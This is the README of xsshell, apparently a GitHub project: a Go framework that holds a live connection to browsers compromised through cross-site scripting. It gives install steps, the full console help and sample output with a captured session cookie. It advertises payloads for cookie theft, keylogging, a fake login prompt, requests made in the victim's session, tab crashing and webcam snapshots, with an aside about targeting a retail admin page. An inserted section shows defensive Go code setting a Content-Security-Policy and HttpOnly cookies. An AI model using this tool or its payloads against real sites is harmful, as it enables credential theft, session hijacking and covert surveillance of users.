Project author: raz-varren

Project description:
An XSS reverse shell framework
Language: Go
Project URL: git://github.com/raz-varren/xsshell.git
Created: 2018-11-27T05:42:58Z
Project community: https://github.com/raz-varren/xsshell

License: MIT License


XSShell

XSShell is a cross-site-scripting reverse shell… Okay, well maybe it’s not a true reverse shell, but it will allow you to interact in real time with an XSS victim’s browser.

Just run the xsshell binary to set up your listener endpoint, do your XSS thing to get the exploit JS onto the victim’s browser, and as soon as they run it you should see something like this pop up in your console:

    ====== start socket: 1, header: AmaaKrM= ======
    socket connected: 1
    user agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134
    page url: http://example.com/
    referrer: http://google.com/
    cookies: phpsessid=abababababababab
    ====== end socket: 1, header: AmaaKrM= ======

Once you have a connection you can execute any javascript file you want on the browser, and have that script return data to your console. This may not seem very useful at first, but it allows you to be more tactical and react in real time to the environment that the script is running on. Environments like say… an admin page used to approve and manage orders placed on a retail site :)

XSShell also comes with a number of premade XSS payloads to use:

  • \alert - send a js alert message
  • \cs - get cookies and any updates to the cookies
  • \gi - download all images on the page
  • \kl - key logger
  • \ll - list all links on the page
  • \src - download the current page source
  • \pfl - show the user a modal and prompt them to login
  • \xhr - make xhr requests in the context of the victim’s browser
  • \ct - crash the victim’s browser tab
  • \wcs - attempt to take a snapshot from the victim’s webcam (WARNING: most modern browsers will prompt for access to webcams)
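
Seen from the site being defended, two response settings blunt what the connection banner and the \cs payload above depend on: a Content-Security-Policy whose connect-src makes the browser refuse a WebSocket to any other origin, and an HttpOnly session cookie that script cannot read. The Go sketch below is an added example, not part of xsshell or its README; the names harden, login and probe are hypothetical, the cookie name is taken from the sample output, and its value is constructed.

```go
package main

import (
	"fmt"
	"net/http"
	"net/http/httptest"
)

// harden wraps a handler so every response carries a CSP. connect-src 'self'
// limits fetch, XHR and WebSocket destinations to the page's own origin, and
// default-src 'self' (without 'unsafe-inline') also refuses inline script.
func harden(next http.Handler) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		w.Header().Set("Content-Security-Policy",
			"default-src 'self'; connect-src 'self'")
		next.ServeHTTP(w, r)
	})
}

// login is a hypothetical handler that issues the session cookie.
// HttpOnly keeps it out of document.cookie; Secure keeps it off plain HTTP.
func login(w http.ResponseWriter, r *http.Request) {
	http.SetCookie(w, &http.Cookie{
		Name:     "phpsessid",
		Value:    "constructed-sample-value", // constructed, not a real session id
		Path:     "/",
		HttpOnly: true,
		Secure:   true,
		SameSite: http.SameSiteLaxMode,
	})
	fmt.Fprintln(w, "ok")
}

// probe sends one request through the hardened handler and returns the
// policy header and the cookie a browser would receive.
func probe() (csp string, cookie *http.Cookie) {
	rec := httptest.NewRecorder()
	req := httptest.NewRequest("GET", "/login", nil)
	harden(http.HandlerFunc(login)).ServeHTTP(rec, req)
	res := rec.Result()
	return res.Header.Get("Content-Security-Policy"), res.Cookies()[0]
}

func main() {
	csp, c := probe()
	fmt.Println("CSP:", csp)
	fmt.Printf("cookie %s HttpOnly=%v Secure=%v\n", c.Name, c.HttpOnly, c.Secure)
}
```

Neither setting removes the injection flaw itself; output encoding at the point where untrusted data reaches the page is still the fix.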

Install

To install xsshell run:

    go get github.com/raz-varren/xsshell
    go install github.com/raz-varren/xsshell

Mods

If you modify any of the JS files in this package, make sure you run:

    go generate github.com/raz-varren/xsshell...
    go install github.com/raz-varren/xsshell

This will ensure that the updated files are packed into the binary.

Usage

The xsshell command:

    xsshell -h
    Usage of xsshell:
      -cert string
            ssl cert file
      -host string
            websocket listen address
      -key string
            ssl key file
      -log string
            specify a log file to log all console communication
      -path string
            websocket connection path (default "/s")
      -port string
            websocket listen port (default "8234")
      -servdir string
            specify a directory to serve files from. a file server will not be started if no directory is specified
      -servpath string
            specify the base url path that you want to serve files from (default "/static/")
      -wrkdir string
            working directory that will be used as the relative root path for any commands requiring user provided file paths (default "./")

Starting the shell console:

    xsshell
    listening for sockets on :8234, at url path: /s
    starting console
    type \? to list available commands
    xsshell >
    xsshell > \?
    xsshell > \help \? \h: list available commands
    xsshell > \alert: send an alert message to the target set
    xsshell > usage: \alert ALERT_MESSAGE
    xsshell > \cs: get the current cookies from the target set's current page and any cookie updates.
    xsshell > \ct: crash the target set's tab
    xsshell > \emd: return a list of media devices accessible to the target set's browser
    xsshell > \ex: print out the client exploit javascript
    xsshell > \exm: print out the minified version of the client exploit javascript
    xsshell > \gi: download all images on the target set's page.
    xsshell > images will be stored in DOWNLOAD_DIR.
    xsshell > relative file paths are relative to the path provided to -wrkdir
    xsshell > usage: \gi [DOWNLOAD_DIR]
    xsshell > examples:
    xsshell > \gi
    xsshell > \gi /tmp/images
    xsshell > \gi imgdir
    xsshell > \kl: start a keylogger on the target set
    xsshell > \ll: list out any links found on the target set's currently open page
    xsshell > \pfl: open a modal on the target set's page prompting them for a username and password
    xsshell > \ps: print out socket info for all actively connected websockets
    xsshell > \q: exit this program
    xsshell > \sf: send a javascript file to the target set and execute it.
    xsshell > any data can be returned from the target set by calling `this.send(\"return data string\");` in the script.
    xsshell > relative file paths are relative to the path provided to -wrkdir
    xsshell > usage: \sf FILE_PATH
    xsshell > \sfl: resend the last file that was sent using \sf, includes any new changes to the file
    xsshell > \src: get the target set's currently rendered page source
    xsshell > \st: set the websockets to target. one or more targets can be set with the following methods:
    xsshell > * -targets all active websocket connections (default target set)
    xsshell > 8 -target a single websocket connection belonging to that id number
    xsshell > 1,2,8,10 -targets all websocket IDs in the comma separated list
    xsshell > 4-16 -targets all websocket IDs from the lowest number listed to the highest number listed
    xsshell > 4- -targets all websocket IDs that are greater than or equal to the listed number
    xsshell > -16 -targets all websocket IDs that are less than or equal to the listed number
    xsshell > usage: \st TARGET_SET
    xsshell > examples:
    xsshell > \st *
    xsshell > \st 2
    xsshell > \st 2,4,7
    xsshell > \st 10-15
    xsshell > \st 6-
    xsshell > \st -100
    xsshell > \wcs: attempt to take a snapshot from the target set's webcam, if one is available.
    xsshell > images will be stored in DOWNLOAD_DIR.
    xsshell > relative file paths are relative to the path provided to -wrkdir.
    xsshell > NOTE: using this command may prompt the target set for webcam access.
    xsshell > the target set may reject the prompt, or ignore it entirely.
    xsshell > usage: \ws [DOWNLOAD_DIR]
    xsshell > examples:
    xsshell > \wcs /tmp/webcam_snaps
    xsshell > \wcs snaps
    xsshell > \xhr: send an xhr request from the target set's current page
    xsshell > usage: \xhr HTTP_METHOD FULL_URL [CONTENT_HEADER] [POST_BODY]
    xsshell > examples:
    xsshell > \xhr GET https://google.com/
    xsshell > \xhr POST https://google.com/ application/json {"hello": "world"}
    xsshell >